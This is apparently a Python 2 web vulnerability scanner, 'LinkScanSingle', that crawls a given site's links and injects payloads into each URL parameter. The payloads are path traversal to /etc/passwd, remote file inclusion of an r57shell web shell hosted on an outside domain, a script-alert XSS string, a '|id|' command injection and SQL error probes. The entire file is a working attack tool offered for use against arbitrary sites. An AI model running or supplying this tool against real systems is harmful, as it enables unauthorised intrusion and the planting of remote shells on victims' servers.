LinkScanSingle LFI,XSS,RFI,SQL,CMD injection

1. #!/usr/bin/python
2. #LinkScanSingle will take a site and
3. #collect links from the source. If the link
4. #contains a = it checks LFI,XSS,RFI,SQL,CMD injection
5. #searching source (simple)
6.  
7. #If your going to use a different shell then the
8. #one I have supplied, you will need to change line
9. #54 (r57shell) to something in your shell source.
10.  
11. from sgmllib import SGMLParser
12. import sys, urllib, httplib, re, urllib2, sets, socket
13.  
14. socket.setdefaulttimeout(5)
15.  
16. class URLLister(SGMLParser):
17.    def reset(self):
18.       SGMLParser.reset(self)
19.       self.urls = []
20.  
21.    def start_a(self, attrs):
22.       href = [v for k, v in attrs if k=='href']
23.       if href:
24.          self.urls.extend(href)
25.  
26. def parse_urls(links):
27.    urls = []
28.    for link in links:
29.       num = link.count("=")
30.       if num > 0:
31.          for x in xrange(num):
32.             x = x+1
33.             if link[0] == "/" or link[0] == "?":
34.                url = site+link.rsplit("=",x)[0]+"="
35.             else:
36.                url = link.rsplit("=",x)[0]+"="
37.             if url.find(site.split(".",1)[1]) == -1:
38.                url = site+url
39.             if url.count("//") > 1:
40.                url = "http://"+url[7:].replace("//","/",1)
41.             urls.append(url)
42.    urls = list(sets.Set(urls))
43.    return urls
44.          
45. def main(host):
46.    print "\n\t[+] Testing:",host,"\n"
47.    try:
48.       if verbose == 1:
49.          print "[+] Checking XSS"
50.       xss(host)
51.    except(urllib2.HTTPError, urllib2.URLError), msg:
52.       #print "[-] XSS Error:",msg
53.       pass
54.    try:
55.       if verbose == 1:
56.          print "[+] Checking LFI"
57.       lfi(host)
58.    except(urllib2.HTTPError, urllib2.URLError), msg:
59.       #print "[-] LFI Error:",msg
60.       pass
61.    try:
62.       if verbose == 1:
63.          print "[+] Checking RFI"
64.       rfi(host)
65.    except(urllib2.HTTPError, urllib2.URLError), msg:
66.       #print "[-] RFI Error:",msg
67.       pass
68.    try:
69.       if verbose == 1:
70.          print "[+] Checking CMD"
71.       cmd(host)
72.    except(urllib2.HTTPError, urllib2.URLError), msg:
73.       #print "[-] CMD Error:",msg
74.       pass
75.    try:
76.       if verbose == 1:
77.          print "[+] Checking SQL"
78.       sql(host)
79.    except(urllib2.HTTPError, urllib2.URLError), msg:
80.       #print "[-] SQL Error:",msg
81.       pass
82.  
83. def rfi(host):
84.  
85.    try:
86.       source = urllib2.urlopen(host+RFI).read()
87.       if re.search("r57shell", source):
88.          print "[+] RFI:",host+RFI
89.       else:
90.          if verbose == 1:
91.             print "[-] Not Vuln."
92.    except(),msg:
93.       #print "[-] Error Occurred",msg
94.       pass
95.  
96. def xss(host):
97.    source = urllib2.urlopen(host+XSS).read()
98.    if re.search("XSS", source) != None:
99.       print "[!] XSS:",host+XSS
100.    else:
101.       if verbose == 1:
102.          print "[-] Not Vuln."
103.      
104. def sql(host):
105.    for pload in SQL:
106.       source = urllib2.urlopen(host+pload).read()
107.       if re.search("Warning:", source) != None:
108.          print "[!] SQL:",host+pload
109.       else:
110.          if verbose == 1:
111.             print "[-] Not Vuln."
112.      
113. def cmd(host):
114.    source = urllib2.urlopen(host+CMD).read()
115.    if re.search("uid=", source) != None:
116.       print "[!] CMD:",host+CMD
117.    else:
118.       if verbose == 1:
119.          print "[-] Not Vuln."
120.  
121. def lfi(host):
122.  
123.    source = urllib2.urlopen(host+LFI).read()
124.    if re.search("root:", source) != None:
125.       print "[!] LFI:",host+LFI
126.    else:
127.       if verbose == 1:
128.          print "[-] Not Vuln."
129.    source = urllib2.urlopen(host+LFI+"%00").read()
130.    if re.search("root:", source) != None:
131.       print "[!] LFI:",host+LFI+"%00"
132.    else:
133.       if verbose == 1:
134.          print "[-] Not Vuln. w/  Null Byte"
135.      
136. print "\n\t   d3hydr8[at]gmail[dot]com LinkScanSingle v1.3"
137. print "\t-------------------------------------------------\n"
138.          
139. if len(sys.argv) not in [2,3]:
140.    print "Usage : ./linkscan.py <site> [option]"
141.    print "Ex: ./linkscan.py http://www.google.com -verbose"
142.    print "\n\t[Option]"
143.    print "\t\t-verbose/-v | Verbose Output\n"
144.    sys.exit(1)
145.    
146. LFI = "../../../../../../../../../../../../etc/passwd"
147. RFI = "http://yozurino.com/r.txt?"
148. RFI_TITLE = "Target"
149. XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
150. CMD = "|id|"
151. SQL = ["-1","999999"] #Add more or change sql payloads
152.    
153. site = sys.argv[1].replace("\n","")
154. print "\n[+] Collecting:",site
155. try:
156.    if sys.argv[2].lower() == "-v" or sys.argv[2].lower() == "-verbose":
157.       verbose = 1
158.       print "[+] Verbose Mode On\n"
159. except(IndexError):
160.    print "[-] Verbose Mode Off\n"
161.    verbose = 0
162.    pass
163. site = site.replace("http://","").rsplit("/",1)[0]+"/"
164. site = "http://"+site.lower()
165. try:
166.    usock = urllib.urlopen(site)
167.    parser = URLLister()
168.    parser.feed(usock.read().lower())
169.    parser.close()
170.    usock.close()
171. except(IOError, urllib2.URLError), msg:
172.    print "[-] Error Connecting to",site
173.    print "[-]",msg
174.    sys.exit(1)
175. urls = parse_urls(parser.urls)
176. print "[+] Links Found:",len(urls)
177. for url in urls:
178.    try:
179.       main(url)
180.    except(KeyboardInterrupt):
181.       pass
182. print "\n[-] Done\n"